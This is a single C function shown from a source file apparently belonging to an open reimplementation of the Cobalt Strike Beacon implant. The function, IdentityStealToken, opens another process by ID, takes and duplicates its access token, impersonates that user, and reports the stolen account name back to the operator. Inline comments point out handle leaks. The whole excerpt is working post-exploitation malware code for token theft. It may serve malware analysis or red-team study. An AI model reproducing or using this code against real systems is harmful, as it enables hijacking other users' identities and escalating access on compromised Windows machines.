CobaltStrike_OpenBeacon/Beacon/identity.c
Line 315 in 93e5703
```c
void IdentityStealToken(char* buffer, int length)
{
	int pid;

	if (length != sizeof(pid))
		return;

	datap parser;
	BeaconDataParse(&parser, buffer, length);
	pid = BeaconDataInt(&parser);

	HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
	if (!hProcess)
	{
		int lastError = GetLastError();
		LERROR("Could not open process %d: %s", pid, LAST_ERROR_STR(lastError));
		BeaconErrorDD(ERROR_OPEN_PROCESS_FAILED, pid, lastError);
		return;
	}

	HANDLE hToken;
	if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &hToken))
	{
		int lastError = GetLastError();
		LERROR("Could not open process token: %d (%s)", pid, LAST_ERROR_STR(lastError));
		BeaconErrorDD(ERROR_OPEN_PROCESS_TOKEN_FAILED, pid, lastError);
		return; // << leaks hProcess
	}

	BeaconRevertToken();

	if (!ImpersonateLoggedOnUser(hToken))
	{
		int lastError = GetLastError();
		LERROR("Failed to impersonate token from %d (%s)", pid, LAST_ERROR_STR(lastError));
		BeaconErrorDD(ERROR_IMPERSONATE_STEAL_TOKEN_FAILED, pid, lastError);
		return; // << leaks hProcess, hToken
	}

	if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityDelegation, TokenPrimary, &gIdentityToken))
	{
		int lastError = GetLastError();
		LERROR("Failed to duplicate token from %d (%s)", pid, LAST_ERROR_STR(lastError));
		BeaconErrorDD(ERROR_DUPLICATE_TOKEN_FAILED, pid, lastError);
		return; // << leaks hProcess, hToken
	}

	if (!ImpersonateLoggedOnUser(gIdentityToken))
	{
		int lastError = GetLastError();
		LERROR("Failed to impersonate logged on user %d (%s)", pid, LAST_ERROR_STR(lastError));
		BeaconErrorDD(ERROR_IMPERSONATE_LOGGED_ON_USER_FAILED, pid, lastError);
		return; // << leaks hProcess, hToken
	}

	CloseHandle(hProcess);

	if (hToken)
		CloseHandle(hToken);

	char accountName[0x200];
	if (IdentityGetUserInfo(gIdentityToken, accountName, sizeof(accountName)))
	{
		BeaconOutput(CALLBACK_TOKEN_STOLEN, accountName, strlen(accountName));
	}
}
```